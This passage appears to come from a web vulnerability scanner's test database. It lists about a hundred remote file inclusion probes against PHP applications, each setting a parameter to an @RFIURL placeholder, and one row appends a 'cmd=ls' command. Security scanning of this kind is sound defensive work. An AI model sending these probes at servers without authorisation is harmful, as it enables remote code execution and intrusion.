(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003865\",\"5292\",\"c\",\"/ATutor/documentation/common/search.php?section=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003866\",\"5292\",\"c\",\"/ATutor/documentation/common/vitals.inc.php?req_lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003867\",\"5292\",\"c\",\"/ATutor/include/classes/module/module.class.php?row[dir_name]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003868\",\"5292\",\"c\",\"/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003869\",\"5292\",\"c\",\"/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003870\",\"5292\",\"c\",\"/Administration/Includes/configureText.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003871\",\"5292\",\"c\",\"/Administration/Includes/contentHome.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003872\",\"5292\",\"c\",\"/Administration/Includes/deleteContent.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003873\",\"5292\",\"c\",\"/Administration/Includes/deleteUser.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003874\",\"5292\",\"c\",\"/Administration/Includes/userHome.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003875\",\"5292\",\"c\",\"/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003876\",\"5292\",\"c\",\"/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003877\",\"5292\",\"c\",\"/BE_config.php?_PSL[classdir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003878\",\"5292\",\"c\",\"/BPNEWS/bn_smrep1.php?bnrep=@RFIURL?&\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003879\",\"5292\",\"c\",\"/Base/Application.php?pear_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003880\",\"5292\",\"c\",\"/Bcwb_PATH/dcontent/default.css.php?root_path_admin=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003881\",\"5292\",\"c\",\"/Bcwb_PATH/include/startup.inc.php?root_path_admin=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003882\",\"5292\",\"c\",\"/Bcwb_PATH/system/default.css.php?root_path_admin=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003883\",\"5292\",\"c\",\"/Beautifier/Core.php?BEAUT_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003884\",\"5292\",\"c\",\"/BetaBlockModules//Module/Module.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003885\",\"5292\",\"c\",\"/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003886\",\"5292\",\"c\",\"/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003887\",\"5292\",\"c\",\"/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003888\",\"5292\",\"c\",\"/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003889\",\"5292\",\"c\",\"/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003890\",\"5292\",\"c\",\"/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003891\",\"5292\",\"c\",\"/BetaBlockModules/EditProfileModule/external.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003892\",\"5292\",\"c\",\"/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003893\",\"5292\",\"c\",\"/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003894\",\"5292\",\"c\",\"/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003895\",\"5292\",\"c\",\"/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003896\",\"5292\",\"c\",\"/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003897\",\"5292\",\"c\",\"/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003898\",\"5292\",\"c\",\"/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003899\",\"5292\",\"c\",\"/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003900\",\"5292\",\"c\",\"/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003901\",\"5292\",\"c\",\"/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003902\",\"5292\",\"c\",\"/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003903\",\"5292\",\"c\",\"/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003904\",\"5292\",\"c\",\"/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003905\",\"5292\",\"c\",\"/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003906\",\"5292\",\"c\",\"/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003907\",\"5292\",\"c\",\"/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003908\",\"5292\",\"c\",\"/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003909\",\"5292\",\"c\",\"/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003910\",\"5292\",\"c\",\"/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003911\",\"5292\",\"c\",\"/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003912\",\"5292\",\"c\",\"/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003913\",\"5292\",\"c\",\"/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003914\",\"5292\",\"c\",\"/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003915\",\"5292\",\"c\",\"/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003916\",\"5292\",\"c\",\"/BetaBlockModules/MyNetworksModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003917\",\"5292\",\"c\",\"/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003918\",\"5292\",\"c\",\"/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003919\",\"5292\",\"c\",\"/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003920\",\"5292\",\"c\",\"/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003921\",\"5292\",\"c\",\"/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003922\",\"5292\",\"c\",\"/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003923\",\"5292\",\"c\",\"/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003924\",\"5292\",\"c\",\"/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003925\",\"5292\",\"c\",\"/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003926\",\"5292\",\"c\",\"/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003927\",\"5292\",\"c\",\"/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003928\",\"5292\",\"c\",\"/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003929\",\"5292\",\"c\",\"/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003930\",\"5292\",\"c\",\"/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003931\",\"5292\",\"c\",\"/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003932\",\"5292\",\"c\",\"/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003933\",\"5292\",\"c\",\"/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003934\",\"5292\",\"c\",\"/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003935\",\"5292\",\"c\",\"/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003936\",\"5292\",\"c\",\"/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003937\",\"5292\",\"c\",\"/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003938\",\"5292\",\"c\",\"/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003939\",\"5292\",\"c\",\"/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003940\",\"5292\",\"c\",\"/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003941\",\"5292\",\"c\",\"/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003942\",\"5292\",\"c\",\"/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=@RFIURL?admin\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003943\",\"5292\",\"c\",\"/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003944\",\"5292\",\"c\",\"/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003945\",\"5292\",\"c\",\"/CheckUpload.php?Language=@RFIURL&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003946\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/backend_search.php?contenido_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003947\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003948\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003949\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003950\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003951\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003952\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003953\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003954\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003955\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003956\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003957\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003958\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003959\",\"5292\",\"c\",\"/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003960\",\"5292\",\"c\",\"/CoupleDB.php?Parametre=0&DataDirectory=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003961\",\"5292\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003962\",\"5292\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003963\",\"5292\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003964\",\"5292\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003965\",\"5292\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003966\",\"5292\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003967\",\"5292\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003968\",\"5292\",\"c\",\"/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 